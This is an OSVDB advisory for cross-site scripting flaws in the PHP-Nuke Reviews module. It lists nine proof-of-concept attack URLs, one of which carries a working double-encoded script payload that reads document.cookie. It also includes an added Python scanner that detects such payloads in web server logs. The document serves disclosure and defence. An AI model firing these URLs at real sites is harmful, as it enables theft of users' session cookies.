PHP-Nuke Reviews Module Multiple Variable XSS

2004-05-14T10:09:03
ID OSVDB:6999
Type osvdb
Reporter DarkBicho(darkbicho@gmail.com), Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-05-14T10:09:03

Description

Vulnerability Description

PHP-Nuke contains a flaw that allows a remote cross-site scripting (XSS) attack. The flaw exists because the application does not validate the url, cover, rlanguage, hits, reviewer, text, id, title and uname variables upon submission to the Reviews module. A user could create a specially crafted URL that executes arbitrary code in another user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003bar.org&reviewer=f00bar&url_title=foobar&url=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003bar.org&reviewer=f00bar&cover=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00bar.org&reviewer=f00bar&rlanguage=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00bar.org&reviewer=f00bar&hits=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00bar.org&reviewer=[XSS CODE]

http://[victim]/nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00bar.org&text=f00%253c/ textarea>%253cscript>alert%2528document.cookie);%253c/script>bar

http://[victim]/nuke73/modules.php?name=Reviews&rop=savecomment&uname=[XSS CODE]&id=8&score=9

http://[victim]/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1>&title=a

http://[victim]/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>
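For defenders reviewing web server logs, the following added example (not part of the original advisory or of PHP-Nuke) flags Reviews module requests whose listed parameters contain markup characters after repeated percent-decoding, which also catches the double-encoded `%253c` form shown above. It assumes Apache-style access-log request lines and only inspects the query string; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters the advisory lists as unvalidated in the Reviews module.
REVIEW_PARAMS = {"url", "cover", "rlanguage", "hits", "reviewer",
                 "text", "id", "title", "uname"}
MARKUP = re.compile(r'[<>"]')   # apostrophes left out: they occur in real names
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MAX_ROUNDS = 3                  # assumption: unwraps %253c -> %3c -> <

def fully_decode(value):
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_review_params(target):
    """Sorted names of Reviews parameters that carry markup once decoded."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # decodes once
    if not parts.path.endswith("/modules.php") or ("name", "Reviews") not in pairs:
        return []
    return sorted({k for k, v in pairs
                   if k in REVIEW_PARAMS and MARKUP.search(fully_decode(v))})

def scan(log_lines):
    """Return (line_number, parameter_names) for each flagged request."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        flagged = suspicious_review_params(match.group(1)) if match else []
        if flagged:
            findings.append((number, flagged))
    return findings

# Constructed access-log lines (not from the advisory); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/May/2004:10:09:03 +0000] "GET /nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&reviewer=f00bar HTTP/1.1" 200 5120',
    '192.0.2.11 - - [14/May/2004:10:09:04 +0000] "GET /nuke1/modules.php?name=Reviews&rop=postcomment&id=%27%3Ch1%3EDarkBicho%3C/h1%3E&title=a HTTP/1.1" 200 4312',
    '192.0.2.12 - - [14/May/2004:10:09:05 +0000] "GET /nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f00%253c/textarea%253e HTTP/1.1" 200 4410',
    '192.0.2.13 - - [14/May/2004:10:09:06 +0000] "GET /nuke73/modules.php?name=News&title=%3Cb%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(names)}")
```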

References:

Secunia Advisory ID: 11852
Related OSVDB ID: 7001
Related OSVDB ID: 7000
Related OSVDB ID: 6997
Related OSVDB ID: 6998
Related OSVDB ID: 7002
Related OSVDB ID: 7003
Other Advisory URL: http://bichosoft.webcindario.com/advisory-05.txt
Other Advisory URL: http://www.waraxe.us/index.php?modname=sa&id=32
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0310.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0095.html
CVE-2004-2294
Bugtraq ID: 10524